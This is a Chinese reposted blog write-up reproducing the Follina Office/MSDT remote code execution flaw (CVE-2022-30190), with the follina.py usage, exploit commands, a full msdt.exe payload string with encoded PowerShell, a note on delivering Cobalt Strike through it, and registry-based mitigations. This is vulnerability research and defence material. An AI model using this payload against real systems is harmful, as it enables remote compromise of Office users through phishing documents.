1. Toy模板网首页
  2. > Toy博客

Windows MSDT RCE(CVE-2022-30190)复现

10月前 作者:OceanSec 分类:Toy博客 阅读(37) 违法举报

这篇具有很好参考价值的文章主要介绍了Windows MSDT RCE(CVE-2022-30190)复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Windows MSDT RCE(CVE-2022-30190)复现

介绍

可利用恶意 Office 文件中的远程模板功能从远程网络服务器获取恶意 HTML 文件,通过微软支持诊断工具(Microsoft Support Diagnostic Tool,MSDT)执行恶意 PowerShell 代码。该漏洞在宏被禁用的情况下,仍然可以调用 MSDT 执行恶意代码。并且当恶意文件另存为 RTF 格式时,还可以通过 Windows 资源管理器中的预览窗格触发此 rce 的调用,无需执行也可以在目标机器上执行任意代码。

利用 RCE 能够在非管理员权限、禁用宏且在 windows defender 开启的情况下绕过防护,达到上线的效果

RTF是Rich Text Format的缩写,意即多文本格式。 这是一种类似DOC格式(Word文档)的文件,有很好的兼容性,使用Windows“附件”中的“写字板”就能打开并进行编辑。 使用“写字板”打开一个RTF格式文件时,将看到文件的内容;如果要查看RTF格式文件的源代码,只要使用“记事本”将它打开就行了

影响版本:

目前难以全面统计该 cve 影响的Office版本,微软官方尚公布该 cve 波及的具体范围。经安天CERT分析人员验证,确认受该 cve 影响的版本如下:

Microsoft Office 2013 Service Pack 1 (64-bit edition)

Microsoft Office 2013 Service Pack 1 (32-bit edition)

Microsoft Office 2016 (64-bit edition)

Microsoft Office 2016 (32-bit edition)

Microsoft Office LTSC 2021 for 32-bit edition

Microsoft Office LTSC 2021 for 64-bit edition

复现

我这里复现用的版本是:office Microsoft Office LTSC 专业增强版 2021

Poc:https://github.com/chvancooten/follina.py

提供了很多利用方法

Usage:

$ python .\follina.py -h
usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] -t {rtf,docx} [-u URL] [-H HOST] [-P PORT]

options:
  -h, --help            show this help message and exit

Required Arguments:
  -m {command,binary}, --mode {command,binary}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY
                        The full path of the binary to run. Can be local or remote from an SMB share

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -t {rtf,docx}, --type {rtf,docx}
                        The type of payload to use, can be "docx" or "rtf"
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost". Disables web server if custom URL scheme or path are specified
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -P PORT, --port PORT  The port to run the HTTP server on, defaults to 80

  • 执行命令

    python .\follina.py -m command -c calc -t docx

    Windows MSDT RCE(CVE-2022-30190)复现
    可以通过 -c 参数指定 cs 的 powershell 代码上线 cs

  • 执行二进制文件

    python follina.py -m binary -b \windows\system32\calc.exe -H 0.0.0.0 -P 8080 -t docx

生成 docx 文档后点击
Windows MSDT RCE(CVE-2022-30190)复现

Poc 分析

分析 Python 代码

首先根据 -H -p 参数指定的 IP 和端口生成 payload_url,url 就是生成的 exploit.html 文件位置

Windows MSDT RCE(CVE-2022-30190)复现

Windows MSDT RCE(CVE-2022-30190)复现

在上面的代码中可以看到如果指定模式为 command 就会拼接ms-msdt:开头的字符串,然后调用 generate docx 其实就是将 payload_url 拼接到 document.xml-rels.tpl 中然后生成 word 文件

Windows MSDT RCE(CVE-2022-30190)复现

Windows MSDT RCE(CVE-2022-30190)复现

之前搞过 邮 件 钓 鱼 的同学都应该很清除这里的逻辑是向word\_rels\document.xml.rels写一个远程模板地址,CobaltStrike使用:第三篇使用CS进行用户驱动攻击(钓鱼攻击)

在来看一下这个 exploit.html 的具体内容,可以看到ms-msdt开头的字符串被拼接到了<script>标签中,然后调整转到这个伪协议

Windows MSDT RCE(CVE-2022-30190)复现

ms-msdt 协议

在注册表中找到,其 command 是"%SystemRoot%\system32\msdt.exe" % 1

Windows MSDT RCE(CVE-2022-30190)复现

msdt.exe 是微软支持诊断工具,官网文档

官网文档中给出了语法参数对照 payload

msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
  • /id PCWDiagnostic表示运行 PCWDiagnostic 诊断包

大概意思就是该部分表示要在故障排除阶段运行的脚本,发生故障即触发 payload 中的 powershell 代码

修复

禁用MSDT URL协议

  1. 以管理员身份运行命令提示符

  2. 备份注册表项后,执行命令:reg export HKEY_CLASSES_ROOT\ms-msdt filename

  3. 再执行命令:reg delete HKEY_CLASSES_ROOT\ms-msdt /f

若需要撤销禁用则用管理员身份打开cmd执行:reg import filename

受本次 RCE 影响的Office版本目前不便统计,且暂无官方补丁,由此判断:该漏洞后续被利用的可能性较大。鉴于本次漏洞影响十分广泛且危害较大,安天CERT给出下列建议:

  1. 谨慎下载及打开来源不明或内容可疑的文档;

  2. 关闭资源管理器的文件内容预览功能;

  3. 更新终端防病毒程序(及)病毒库;

  4. 禁用ms-msdt功能,并取消对应的rtf文件类型关联。

Follina Microsoft Office RCE with MS-MSDT Protocol

Microsoft Office 远程代码执行(CVE-2022-30190)风险提示

公众号:红队蓝军,Windows支持诊断工具(MSDT)远程代码执行(CVE-2022-30190)分析复现_修复

Windows MSDT RCE(CVE-2022-30190)复现文章来源地址https://www.toymoban.com/news/detail-468393.html

到了这里,关于Windows MSDT RCE(CVE-2022-30190)复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • 【漏洞复现】Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)

    【漏洞复现】Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)

    0x01 Microsoft Office Microsoft Office是由Microsoft(微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint等。 0x02 漏洞简介 该文档使用 Word 远程模板功能从远程网络服务器检索 HTML 文件,该服务器使用 ms-msdt MSProtocol URI 方案加载代码并执行 PowerShell,禁用宏,仍能通过

    2024年02月05日
    浏览(97)

  • [CVE-2022-30190]MICROSOFT OFFICE MSDT代码执行漏洞

    MSDT(Microsoft Support Diagnostics Tool,微软支持诊断工具)是一个Windows实用程序,用于排除故障并收集诊断数据以供专业人员分析和解决问题。 Shadow Chaser Group 的研究人员在 Twitter 上表示,这个存在于Microsoft Support Diagnostic Tool中的漏洞已经于4月 12日报告给微软,并已经证明该漏洞

    2024年02月04日
    浏览(43)
  • MICROSOFT OFFICE MSDT操作系统命令注入漏洞(CVE-2022-30190)

    MICROSOFT OFFICE MSDT操作系统命令注入漏洞(CVE-2022-30190)

    目录 漏洞概述 受到影响的产品和版本 漏洞复现 1、搭建靶场 2、攻击复现 一、执行系统程序 二、执行系统命令 修复 Microsoft Windows Support Diagnostic Tool是美国微软(Microsoft)公司的收集信息以发送给 Microsoft 支持的工具(Windows上的微软支持诊断工具中存在此漏洞)。当从Word等

    2024年02月06日
    浏览(38)
  • H2db console 未授权访问RCE 漏洞复现+利用(CVE-2022-23221)

    H2db console 未授权访问RCE 漏洞复现+利用(CVE-2022-23221)

    H2是Thomas Mueller提供的一个开源的、纯java实现的关系数据库。H2的主要特点是:非常快,开源,JDBC API;嵌入式和服务器模式;内存数据库;基于浏览器的控制台应用程序。 H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞,在 v2.1.210+ 中修复。2.1.210 之前的 H2 控制台允许远

    2024年02月14日
    浏览(42)
  • CVE-2022-30190复现及原理

    CVE-2022-30190复现及原理

    今天各厂商都在发布CVE-2022-30190的安全通告,作为一个与Office有关的RCE漏洞,其原理并不复杂,但利用非常简单无脑甚至不用点击,以后钓鱼肯定要经常用,这里简单复现分析下。 环境 Win10.0.16299 32位 Microsoft Office 2013 plus版本 参考项目 https://github.com/onecloudemoji/CVE-2022-30190 参考

    2024年02月05日
    浏览(40)
  • CVE漏洞复现-CVE-2022-22965-Spring-RCE漏洞

    CVE漏洞复现-CVE-2022-22965-Spring-RCE漏洞

    Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行

    2023年04月21日
    浏览(60)

  • Fortinet FortiNAC RCE漏洞复现(CVE-2022-39952)

          FortiNAC(Network Access Control) 是Fortinet的一种零信任网络访问控制解决方案,可增强用户对企业网络上的物联网 (IoT) 设备的监控。NAC 是零信任网络访问安全模型的重要组成部分,在该模型中,IT 团队可以轻松了解正在访问网络的人员和设备,以及如何保护网络内外的公司资

    2024年02月06日
    浏览(46)
  • CVE漏洞复现-CVE-2022-22947-Spring Cloud Gateway RCE

    CVE漏洞复现-CVE-2022-22947-Spring Cloud Gateway RCE

    微服务架构与Spring Cloud 最开始时,我们开发java项目时,所有的代码都在一个工程里,我们把它称为单体架构。当我们的项目的代码量越来越大时,开发的成员越来越多时,这时我们项目的性能以及我们开发的效率都会存在非常大的问题,所以对于这样的项目,我们需要把它

    2023年04月14日
    浏览(48)
  • CVE -2022-26134漏洞复现(Confluence OGNL 注入rce漏洞)

    CVE -2022-26134漏洞复现(Confluence OGNL 注入rce漏洞)

    0x01 Atlassian Confluence Atlassian Confluence是一个专业的企业知识管理与协同软件,主要用于公司内员工创建知识库并建立知识管理流程,也可以用于构建企业wiki。其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。因此

    2024年02月16日
    浏览(49)
  • CVE-2022-26134 Confluence OGNL 注入复现及后利用

    CVE-2022-26134 Confluence OGNL 注入复现及后利用

    Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在野利用的代码执行漏洞,攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令 攻击者提供的URI将被转换为namespace,然后该namespace将被转换为OGNL表达式进

    2023年04月14日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包